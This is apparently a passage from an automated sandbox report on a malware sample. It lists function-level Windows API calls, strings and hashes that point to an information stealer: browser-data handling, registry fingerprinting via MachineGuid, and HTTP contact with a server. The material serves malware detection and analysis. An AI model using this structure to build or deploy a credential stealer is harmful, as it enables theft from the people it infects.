                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                          • String ID: :\$C$QuBi
                                                                                                                                                                                                                                                          • API String ID: 1856320939-239756005
                                                                                                                                                                                                                                                          • Opcode ID: 46f9c51eebacc514d902c510a5f97c83c248089cee94a54b85ae1f2405deef70
                                                                                                                                                                                                                                                          • Instruction ID: 387a155c83683fe3d7746e05b28f93743414031ed0c307f567283ae08f3656e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46f9c51eebacc514d902c510a5f97c83c248089cee94a54b85ae1f2405deef70
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB419F7290012CAFCB249F759D49AEEBABCAF09300F0040E5F649E2125DA749F919F94
                                                                                                                                                                                                                                                          Function 00FEEC70 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 331COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2818: CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
                                                                                                                                                                                                                                                            • Part of subcall function 00FE859F: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,00FEECAF), ref: 00FE85A4
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEECD3
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEED4A
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 00FEF05E
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEE40
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEEF1
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEF68
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$CreateFileLibraryLoad
                                                                                                                                                                                                                                                          • String ID: Stable\$ Stable\$C:\ProgramData\chrome.dll$firefox
                                                                                                                                                                                                                                                          • API String ID: 781932549-1706742824
                                                                                                                                                                                                                                                          • Opcode ID: d9ec38415a1a45c3a46919117780d4f922d79715c9f3ae664db8da63efeb26d1
                                                                                                                                                                                                                                                          • Instruction ID: 082f8a6e77e19a23bcfa8db1a2ef7a2b7bfb057228cdb02aff75294193ced7e6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ec38415a1a45c3a46919117780d4f922d79715c9f3ae664db8da63efeb26d1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABC18C33C001099BCB20FBA9ED47A9DB775BF40310F914151EE04A7256EA79AA19EBD2
                                                                                                                                                                                                                                                          Function 00FF6AA3 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE69B7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: StrCmpCA.SHLWAPI(?), ref: 00FE69D1
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6A00
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE6A3F
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE6A6F
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE6A7A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FE6A9E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6AF7
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF6B02
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 00FF6B17
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF6B26
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FF6B3F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                          • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                                                          • Opcode ID: 74320c4469b03b7bc332c63f4d6dbef438e3a792f4f1acca9e35902f88669821
                                                                                                                                                                                                                                                          • Instruction ID: 8dbec81737934c77f8411186eb6f8cda2c7aa037c850680a2b1f45952ae9fbce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74320c4469b03b7bc332c63f4d6dbef438e3a792f4f1acca9e35902f88669821
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31217132D00148ABCB20BB75EC4A9BE7BA8AF45710B118465FF40EB127DE799D05AB91
                                                                                                                                                                                                                                                          Function 00FF721E Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 597networksleepCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00FF8011), ref: 00FF72AB
                                                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,?,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF72B7
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00FF8011), ref: 00FF72C8
                                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,010157A7), ref: 00FF74ED
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FF75AB
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FF75BE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4B20: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE4BBF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4B20: StrCmpCA.SHLWAPI(?), ref: 00FE4BDD
                                                                                                                                                                                                                                                            • Part of subcall function 00FF3B9F: StrCmpCA.SHLWAPI(?,block,?,?,00FF761B), ref: 00FF3BB4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF3B9F: ExitProcess.KERNEL32 ref: 00FF3BBF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE5FCA
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: StrCmpCA.SHLWAPI(?), ref: 00FE5FE8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF335C: strtok_s.MSVCRT ref: 00FF337B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF335C: strtok_s.MSVCRT ref: 00FF33FE
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00FF7971
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6180
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE61C4
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE61F2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2913: SHFileOperationA.SHELL32(?), ref: 00FF2949
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FF7A6A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7D18
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7D27
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00FF7D3C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: ShellExecuteEx.SHELL32(?), ref: 00FF7ED8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7EE7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7EF9
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • a21440e9f7223be06be5f5e2f94969c7, xrefs: 00FF75E3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InternetOpen$Heap_memsetlstrcpy$Process$AllocCloseCreateDirectoryEventFileHandleNamestrtok_s$ConnectExecuteExitHttpInformationModuleOperationOptionRequestShellSleepUserVolumeWindowslstrcatlstrlen
                                                                                                                                                                                                                                                          • String ID: a21440e9f7223be06be5f5e2f94969c7
                                                                                                                                                                                                                                                          • API String ID: 1938121317-1852621708
                                                                                                                                                                                                                                                          • Opcode ID: ccde59f026c8be3b18dedae95943c4141e410ad7345ea0e34fda74d040fcd177
                                                                                                                                                                                                                                                          • Instruction ID: 779e940c2bce3f3b9cd744e014983eeb38349bc3549f55e61969b241076fbb4b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccde59f026c8be3b18dedae95943c4141e410ad7345ea0e34fda74d040fcd177
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A23261729083849BC620FF25DC476AEF7E5BFC0310F51491AFA8857262DB746A09DB93
                                                                                                                                                                                                                                                          Function 00FF17F7 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF182A
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00FF1849
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00FF186E
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00FF187A
                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 00FF188E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                          • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                                                          • Opcode ID: e91e839afa8c0cbc4d8756719899b1fec4f5a236af82f22770f7ffb574926eee
                                                                                                                                                                                                                                                          • Instruction ID: f208d2eeb2ddf6cbc0c6144fa74b03ade41e34beeae844d0356bd7408b67b56c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e91e839afa8c0cbc4d8756719899b1fec4f5a236af82f22770f7ffb574926eee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D1161B594021DAFDB20DF90DD89EEAB7BCEB04304F4041A5B659E6051E774AE888F50
                                                                                                                                                                                                                                                          Function 00FE859F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,00FEECAF), ref: 00FE85A4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 00FE85C4
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(free_result), ref: 00FE85D6
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 00FE85F1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
